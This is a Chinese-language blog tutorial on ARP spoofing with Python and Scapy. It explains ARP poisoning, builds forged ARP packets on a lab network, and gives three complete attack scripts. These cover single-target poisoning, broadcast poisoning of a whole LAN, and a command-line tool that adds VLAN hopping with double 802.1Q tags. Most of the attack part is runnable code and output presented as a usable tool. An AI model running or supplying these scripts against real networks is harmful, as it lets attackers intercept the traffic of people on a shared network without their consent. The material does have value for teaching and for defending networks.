Python 协议攻击脚本(五): ARP欺骗 Arpspoof
程序员文章站
2022-05-16 21:26:52
...
ARP
arp协议
ARP(Address Resolution Protocol)即地址解析协议, 用于实现从 IP 地址到 MAC 地址的映射,即询问目标IP对应的MAC地址,位于数据链路层。
arp欺骗
ARP欺骗(ARP spoofing),又称ARP毒化(ARP poisoning),通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,从而实现窃听数据包
构造数据包
环境
网关 : 10.35.71.254
目标机 : 10.35.71.205
攻击机 : 10.35.68.121
利用Scapy获取分别的ip地址
>>> getmacbyip('10.35.71.205')
'a0:8c:fd:1b:cb:90' #网关mac地址
>>> getmacbyip('10.35.71.254')
'74:25:8a:6a:09:1d #目标机网络地址
>>> get_if_hwaddr('eth0')
'00:0c:29:62:44:de' #自己的mac地址
ARP
>>> ls(ARP)
hwtype : XShortField = (1)
ptype : XShortEnumField = (2048)
hwlen : FieldLenField = (None)
plen : FieldLenField = (None)
op : ShortEnumField = (1)
hwsrc : MultipleTypeField = (None)
psrc : MultipleTypeField = (None)
hwdst : MultipleTypeField = (None)
pdst : MultipleTypeField = (None)
构造ARP需要我们注意的有5个参数:
-
op 取值为1或者2,代表ARP请求或者响应包。
-
hwsrc 发送方Mac地址。
-
psrc 发送方IP地址。
-
hwdst 目标Mac地址。
-
pdst 目标IP地址。
ARP欺骗:发送arp包,让目标机以为是网关发过来的,并且网关mac对应的是攻击机ip,使目标机以为攻击机mac为网关的mac
packet=Ether(src=攻击机mac,dst=目标机mac)/ARP(hwsrc=攻击机mac,hwdst=目标机mac,psrc=网关ip,pdst=目标机ip,op=1)
>>> mac_self = get_if_hwaddr('eth0')
>>> mac_target = getmacbyip('10.35.71.205')
>>>packet=Ether(src=mac_self,dst=mac_target)/ARP(hwsrc=mac_self,hwdst=mac_target,psrc='10.35.71.254',pdst='10.35.71.205',op=1)
>>> packet.show()
###[ Ethernet ]###
dst= a0:8c:fd:1b:cb:90
src= 00:0c:29:62:44:de
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= None
plen= None
op= who-has
hwsrc= 00:0c:29:62:44:de
psrc= 10.35.71.254
hwdst= a0:8c:fd:1b:cb:90
pdst= 10.35.71.205
正常的arp缓存表 arp -a
发送包
>>> sendp(packet,loop=1) #sendp 发送二层包 ..............................................................................................................................................
[...]
毒化后
编写脚本
1.demo
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
from scapy.all import (
get_if_hwaddr,
getmacbyip,
Ether,
ARP,
sendp)
def arp_spoof(target,host,iface):
# target 目标机ip
# host 伪装的ip
mac_self = get_if_hwaddr(iface)
mac_target = getmacbyip(target)
try:
while 1 :
sendp(Ether(src=mac_self,dst=mac_target)/
ARP(hwsrc=mac_self,hwdst=mac_target,psrc=host,pdst=target,op=1))
except KeyboardInterrupt: #捕获Ctrl + C
print('\n[+]Stopped poison')
if __name__ == '__main__':
target = '10.35.71.205'
host = '10.35.71.254'
iface = 'eth0'
arp_spoof(target,host,iface)
运行演示
2.添加广播式的arp欺骗
这对局域网所有主机的进行欺骗,所有主机都会以为攻击机为网关
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
from scapy.all import (
get_if_hwaddr,
getmacbyip,
Ether,
ARP,
sendp)
def arp_spoof(target,host,iface):
# target 目标机ip
# host 伪装的ip
mac_self = get_if_hwaddr(iface)
#如果没有设置目标,则为广播形式
if target:
mac_target = getmacbyip(target)
packet = Ether(src=mac_self, dst=mac_target) /\
ARP(hwsrc=mac_self, hwdst=mac_target, psrc=host, pdst=target, op=1)
print('[+]Poisoning --> ', target, end=' ')
else:
mac_borad = 'ff:ff:ff:ff:ff:ff'
packet = Ether(src=mac_self, dst=mac_borad) /\
ARP(hwsrc=mac_self, hwdst=mac_borad, psrc=host, pdst=target, op=1)
print('[+]Poisoning --> Lan', end=' ')
try:
while 1 :
sendp(packet,verbose=False)
except KeyboardInterrupt: #捕获Ctrl + C
print('\n[+]Stopped poison')
if __name__ == '__main__':
target = ''
host = '10.35.71.254'
iface = 'eth0'
arp_spoof(target,host,iface)
3.完善代码
加入了跨VLAN的功能
详见Python黑帽编程 3.4 跨域VLAN | 玄魂工作室
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
from scapy.all import (
get_if_hwaddr,
getmacbyip,
ARP,
Dot1Q,
Ether,
sendp,
)
import argparse
import os
import sys
import time
mac_broad = 'ff:ff:ff:ff:ff:ff'
def arp_spoof(iface,target,host,vlan_own=False,vlan_target=False):
#target 目标机ip
#host 伪装的ip
mac_self = get_if_hwaddr(iface) #自身mac
if target:
mac_target = getmacbyip(target) #目标机mac
if not mac_target :
print('[-]Error: Could not resole targets MAC address')
sys.exit(1)
ethernet = Ether(src=mac_self, dst=mac_target)
arp = ARP(hwsrc=mac_self, psrc=host,hwdst=mac_target,pdst=target, op=1)
print('[+]Poisoning --> ', target,end=' ')
else:
ethernet = Ether(src=mac_self, dst=mac_broad)
arp = ARP(hwsrc=mac_self,psrc=host,op=1)
print('[+]Poisoning --> LAN',end='')
#判断是否加入Vlan标识
if vlan_target:
vlan_tag = Dot1Q(vlan=vlan_own)/Dot1Q(vlan_target)
pkt = ethernet/vlan_tag/arp
else:
pkt = ethernet/arp
print(" ('Ctrl + C' stop)")
try:
while True:
sendp(pkt,iface=iface,verbose=False)
except KeyboardInterrupt:
print('\n[+]Stopped poison')
arp_recover(iface,host)
#发送正常的arp包
def arp_recover(iface,host):
time.sleep(1)
print('[*]Recovering the network')
mac_host = getmacbyip(host)
pkt = Ether(src=mac_host, dst=mac_broad)/ARP(hwsrc=mac_host, psrc=host, op=1)
sendp(pkt,iface=iface,inter=1,count=2,verbose=False) #inter 发包间隔
time.sleep(1)
print('[+]Complete')
def main():
if os.geteuid() != 0:
print('[-]Need root user to run')
sys.exit(1)
usage = 'usage: arp_spoof.py [-h] [-i IFACE] [-t TARGET] [-vl vlan_own vlan_target] host'
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument('-i','--iface',default='eth0',help='The network interface of use')
parser.add_argument('-t','--target',help='Specify a target to ARP poison')
parser.add_argument('-vl','--vlan',nargs=2,help='The vlan hopping of use eg:-vl 1 2')
parser.add_argument('host',help='host of impersonate')
try:
args = parser.parse_args()
iface,target,vlan,host = args.iface,args.target,args.vlan,args.host
if vlan:
arp_spoof(iface,target,host,vlan_own=vlan[0],vlan_target=vlan[1],)
else:
arp_spoof(iface,target,host)
except ValueError: #捕获输入参数错误
parser.print_help()
if __name__ == '__main__':
main()
参考
上一篇: ARP欺骗